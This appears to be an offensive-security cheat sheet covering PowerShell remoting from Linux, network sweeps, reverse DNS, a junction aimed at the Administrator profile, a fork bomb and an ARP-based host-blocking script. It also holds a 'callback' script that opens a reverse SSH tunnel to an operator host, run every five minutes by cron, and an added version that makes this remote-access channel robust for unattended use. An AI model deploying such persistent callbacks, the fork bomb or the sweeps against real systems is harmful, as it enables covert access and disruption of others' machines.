Install and run PowerShell (pwsh) on Debian/Ubuntu, create remote PowerShell sessions (WinRM) with credentials, create Windows junction links, and common admin scripting patterns. Includes corrected ping sweep and DNS scripts with working syntax.
-
sudo apt install gss-ntlmssp
Installs the GSS-NTLMSSP mechanism. pwsh on Linux needs it for NTLM, which is what -Authentication Negotiate falls back to whenever Kerberos cannot be used (for example when you connect by IP address, as below, rather than by hostname).
-
sudo apt-get install powershell
Installs PowerShell (pwsh) from the configured repositories; the Microsoft package repository must be added first.
-
pwsh
Starts PowerShell.
-
$sec = Read-Host -AsSecureString
$cred = New-Object System.Management.Automation.PSCredential("DOMAIN\username", $sec)
$offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential $cred
Enter-PSSession $offsec_session
Prompts for the password without echoing it, builds a credential object, opens a WinRM session to the target (HTTP on port 5985 by default; add -UseSSL for HTTPS on 5986) and enters an interactive remote shell. Type exit to return to the local prompt; the session stays open until it is removed.
-
New-Item -ItemType Junction -Path 'C:\ProgramData' -Target 'C:\Users\Administrator'
Creates a junction (directory link): a Windows filesystem reparse point, similar in idea to a symlink but junction-specific (directories only, local volumes only, no administrator rights needed). New-Item fails if -Path already exists, and C:\ProgramData exists on every Windows install, so point -Path at a name that does not exist yet.
-
for x in {1..254}; do ping -c 1 -W 1 1.1.1.$x 2>/dev/null | grep -q "64 bytes" && echo "1.1.1.$x"; done > ips.txt
Pings every host in 1.1.1.0/24 once (1 s timeout) and writes the responsive IPs to ips.txt. The ; before done is required; without it bash reports a syntax error. Replace 1.1.1 with the prefix you are actually scanning.
#!/bin/bash
echo "Enter Class C Range (e.g. 192.168.3):"
read -r range
for ip in {1..254}; do
    host "$range.$ip" 2>/dev/null | grep "name pointer"
done
Resolves PTR records (reverse DNS) for each address in the prefix entered at the prompt and prints only the "name pointer" matches.
-
for ip in {1..254}; do dig +short -x 1.1.1.$ip | sed "s/$/ <-- 1.1.1.$ip/"; done > dns.txt
Performs a reverse lookup for every address in 1.1.1.0/24 and writes the results to dns.txt, one line per PTR record in the form "name. <-- 1.1.1.x" (an address with no PTR produces no line, because dig +short prints nothing). As above, the ; before done is required.
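The two one-liners above hard-code the prefix, grep for a byte count that varies with packet size and locale, and probe hosts one at a time, while the PTR script uses whatever was typed at the prompt unchecked. The following is an added example, not one of the page's scripts, that combines both steps: it validates the Class C prefix before using it, relies on ping's exit status, runs the probes in parallel, and writes ips.txt and dns.txt in the same layout as the originals. The prefix is taken from the first argument; output file names are placeholders.

```bash
#!/usr/bin/env bash
# Added example, not one of the page's scripts: a /24 ping sweep followed by
# reverse DNS, with the Class C prefix validated before it is used.
# Placeholders: prefix from argv, output files ips.txt / dns.txt.
set -euo pipefail

# Accept only "a.b.c" with each octet 0-255; rejects junk typed at a read prompt.
valid_prefix() {
    local p=$1 o
    [[ $p =~ ^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})$ ]] || return 1
    for o in "${BASH_REMATCH[@]:1}"; do
        [ "$o" -le 255 ] || return 1
    done
}

# Probe one address; use ping's exit status instead of grepping for "64 bytes",
# which changes with packet size and locale.
probe() {
    if ping -c 1 -W 1 "$1" >/dev/null 2>&1; then
        printf '%s\n' "$1"
    fi
}
export -f probe

# Sweep a.b.c.1-254 with 32 probes in flight; responders go to ips.txt, sorted.
sweep() {
    local prefix=$1 out=${2:-ips.txt}
    valid_prefix "$prefix" || { printf 'bad prefix: %s\n' "$prefix" >&2; return 1; }
    seq 1 254 | sed "s/^/$prefix./" \
        | xargs -P 32 -I{} bash -c 'probe "$1"' _ {} \
        | sort -t. -k4,4n > "$out"
}

# Reverse-resolve each responder in the page's "<name> <-- <ip>" layout,
# printing <none> where the address has no PTR record.
reverse() {
    local in=${1:-ips.txt} out=${2:-dns.txt} ip name
    while read -r ip; do
        name=$(dig +short -x "$ip" 2>/dev/null | head -n 1 || true)
        printf '%s <-- %s\n' "${name:-<none>}" "$ip"
    done < "$in" > "$out"
}

# Usage: ./sweep.sh 192.168.3   (with no arguments only the functions are defined)
if [ $# -ge 1 ]; then
    sweep "$1" && reverse
fi
```

Run it as ./sweep.sh 192.168.3; a prefix such as "192.168.3; rm -rf /" or 256.1.1 is rejected before any command is built from it.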
-
:(){ :|:& };:
Fork bomb: defines a function named : that pipes itself into a background copy of itself, then calls it, so the process count grows exponentially until the system becomes unusable. Do not run it outside a throwaway VM; a per-user process limit (ulimit -u) is the usual defence.
#!/bin/sh
# This script adds static ARP entries for 192.168.1.0/24 starting at .2
# It does not apply to .20, .21, .22 (skips them)
# It assumes .1 is the router
i=2
while [ $i -le 253 ]; do
    if [ $i -ne 20 ] && [ $i -ne 21 ] && [ $i -ne 22 ]; then
        echo "BANNED: 192.168.1.$i"
        arp -s 192.168.1.$i 00:00:00:00:00:0a
    else
        echo "IP NOT BANNED: 192.168.1.$i"
    fi
    i=$((i+1))
done
What it does: iterates .2–.253 and, for every address except .20–.22, adds a static ARP entry mapping it to the bogus MAC 00:00:00:00:00:0a, so frames this box sends to those hosts go nowhere ("BANNED"). It needs root and the net-tools arp command; where that is missing, ip neigh replace <ip> lladdr 00:00:00:00:00:0a dev <iface> nud permanent does the same. The entries only affect this host's own ARP table and do not survive a reboot.
#!/bin/sh
# Callback script (run on the callback source computer)
# It tries multiple possible reachable hostnames, and if one is reachable,
# it opens a reverse SSH tunnel back to the operator box.
# Operator connects to target via: ssh -p 4040 localhost (on operator box)
killall ssh >/dev/null 2>&1
sleep 5
REMLIS=4040
REMUSR="user"
HOSTS="domain1.com domain2.com domain3.com"
for LIVEHOST in $HOSTS; do
    if ping -c 2 -W 1 "$LIVEHOST" >/dev/null 2>&1; then
        ssh -R ${REMLIS}:localhost:22 -i "/home/${REMUSR}/.ssh/id_rsa" -N "${REMUSR}@${LIVEHOST}"
    fi
done
What it does: pings each host in HOSTS and, at the first one that answers, opens a reverse tunnel: port 4040 on the operator host (bound to its loopback unless GatewayPorts is set in sshd) forwards to port 22 on the callback machine, so the operator reaches it with ssh -p 4040 localhost. -N keeps the tunnel open without a shell and blocks, so the loop never advances while the tunnel is up. Two things to know before relying on it: killall ssh kills every ssh client owned by this user, not just a stale tunnel, and the ping check skips hosts that filter ICMP even when TCP/22 is reachable. The key must be usable without a prompt (no passphrase, or an agent) because nothing can answer one from cron.
To schedule it every 5 minutes, run crontab -e and add:
*/5 * * * * /path/to/callback.sh >/dev/null 2>&1
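Run from cron, the script above will trip over itself: killall ssh takes down unrelated sessions, a first-time host key prompt hangs forever, a dead tunnel whose client has not noticed keeps the next run from reconnecting, and if port 4040 is already bound on the operator side ssh stays up with no working forward. The following is an added example, not the page's script, with the same reverse-tunnel design made cron-safe: ssh options that fail fast or keep the link alive, hosts tried directly over TCP/22 instead of via ping, and a lock file in place of killall. HOSTS, REMUSR, KEY, REMLIS and the lock path are placeholders.

```bash
#!/usr/bin/env bash
# Added example, not the page's callback script: the same reverse-tunnel idea made
# cron-safe. Placeholders: HOSTS (operator hosts to try), REMUSR (operator account),
# KEY (private key on the callback machine), REMLIS (listen port on the operator box).
set -euo pipefail

REMLIS=${REMLIS:-4040}
REMUSR=${REMUSR:-user}
KEY=${KEY:-/home/$REMUSR/.ssh/id_rsa}
HOSTS=${HOSTS:-"domain1.com domain2.com domain3.com"}
LOCK=${LOCK:-$HOME/.callback.lock}   # user-owned, not world-writable /tmp

# One ssh argument per line for a given operator host. BatchMode stops a cron job
# hanging on a prompt; ExitOnForwardFailure makes ssh quit (so the next host is tried)
# when port $REMLIS is already taken on the operator side; the keepalives tear down a
# dead tunnel instead of leaving a zombie client that blocks re-connection.
tunnel_args() {
    local host=$1
    printf '%s\n' \
        -N -i "$KEY" \
        -o BatchMode=yes \
        -o ExitOnForwardFailure=yes \
        -o StrictHostKeyChecking=accept-new \
        -o ConnectTimeout=10 \
        -o ServerAliveInterval=30 \
        -o ServerAliveCountMax=3 \
        -R "${REMLIS}:localhost:22" \
        "${REMUSR}@${host}"
}

# Try each host directly over TCP/22; a ping pre-check would skip hosts that filter ICMP.
callback() {
    local host
    local -a args
    for host in $HOSTS; do
        mapfile -t args < <(tunnel_args "$host")
        if ssh "${args[@]}"; then   # blocks for as long as the tunnel is up
            return 0
        fi
    done
    return 1
}

# A lock instead of "killall ssh": a second cron run exits at once while a tunnel
# is up, and other ssh sessions on the box are left alone.
main() {
    exec 9>"$LOCK"
    flock -n 9 || exit 0
    callback
}

# Cron entry: */5 * * * * /path/to/callback.sh run >/dev/null 2>&1
if [ "${1:-}" = run ]; then
    main
fi
```

The operator still connects with ssh -p 4040 localhost on the operator box; nothing changes on that side. accept-new pins the operator host key on first contact and refuses a changed key afterwards, which is the behaviour you want for an unattended client.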
-
Invoke-Command -Session $offsec_session -ScriptBlock { hostname; whoami; ipconfig }
Runs the script block on the remote host over the existing session, without entering an interactive shell, and returns the output locally; this is the form to use when scripting several commands in one round trip.
-
Get-PSSession
Remove-PSSession $offsec_session
Lists the open sessions, then closes the one created above and frees the WinRM connection on the target.
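The interactive sequence above (credential, New-PSSession, Invoke-Command, Remove-PSSession) is what you want to script once it works by hand, and the usual mistake when doing so is to put the password on the pwsh command line, where it lands in shell history and in ps output. The following is an added example, not from the page, that drives the same cmdlets from a Linux shell non-interactively: the password is prompted for (or taken from WINRM_PASS) and handed to pwsh only through the environment, the session is always removed in a finally block, and WINRM_USESSL=1 switches to HTTPS on 5986. Target, user and command are placeholder arguments; pwsh and gss-ntlmssp are assumed to be installed.

```bash
#!/usr/bin/env bash
# Added example, not from the page: run the New-PSSession / Invoke-Command /
# Remove-PSSession sequence from a Linux shell non-interactively. Assumes pwsh and
# gss-ntlmssp are installed. Target, user and command are placeholders passed as
# arguments; the password reaches pwsh only through the environment, so it never
# appears in argv, `ps` output or shell history.
set -euo pipefail

# PowerShell to run on the Linux side; everything it needs comes from env vars.
winrm_ps_script() {
    cat <<'EOF'
$ErrorActionPreference = 'Stop'
$sec  = ConvertTo-SecureString $env:WINRM_PASS -AsPlainText -Force
$cred = [pscredential]::new($env:WINRM_USER, $sec)
$opts = @{ ComputerName = $env:WINRM_TARGET; Authentication = 'Negotiate'; Credential = $cred }
if ($env:WINRM_USESSL -eq '1') { $opts.UseSSL = $true }   # HTTPS on 5986 instead of HTTP on 5985
$s = New-PSSession @opts
try {
    Invoke-Command -Session $s -ScriptBlock ([scriptblock]::Create($env:WINRM_CMD))
} finally {
    Remove-PSSession $s            # runs even when the remote command throws
}
EOF
}

# winrm_run <target> <DOMAIN\user> <powershell command>
winrm_run() {
    local target=$1 user=$2 cmd=$3 dir
    if [ -z "${WINRM_PASS:-}" ]; then
        read -rs -p "Password for $user: " WINRM_PASS
        echo >&2
    fi
    dir=$(mktemp -d)
    trap 'rm -rf "$dir"' RETURN
    winrm_ps_script > "$dir/run.ps1"        # pwsh -File insists on a .ps1 extension
    WINRM_TARGET=$target WINRM_USER=$user WINRM_CMD=$cmd WINRM_PASS=$WINRM_PASS \
        pwsh -NoProfile -NonInteractive -File "$dir/run.ps1"
}

# Usage: ./winrm-run.sh 10.10.10.210 'DOMAIN\username' 'hostname; whoami; ipconfig'
if [ $# -ge 3 ]; then
    winrm_run "$@"
fi
```

Invoke-Command returns deserialized objects, so the output can be piped into further pwsh processing inside WINRM_CMD (for example appending | ConvertTo-Json) and parsed on the Linux side.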
-
while read -r h; do getent hosts "$h"; done < hosts.txt
Resolves each name in hosts.txt (one per line) through the system resolver order from /etc/nsswitch.conf (hosts file, then DNS, etc.) and prints "address name" for every hit; names that do not resolve print nothing.
The exact New-PSSession authentication method and prerequisites depend on two things: whether WinRM is listening over HTTP (5985) or HTTPS (5986, which needs -UseSSL and, for a self-signed listener certificate, -SessionOption (New-PSSessionOption -SkipCACheck -SkipCNCheck)), and whether the target is domain-joined (Kerberos needs the hostname and a valid ticket; an IP address or a non-domain host means NTLM, which is why gss-ntlmssp is installed first).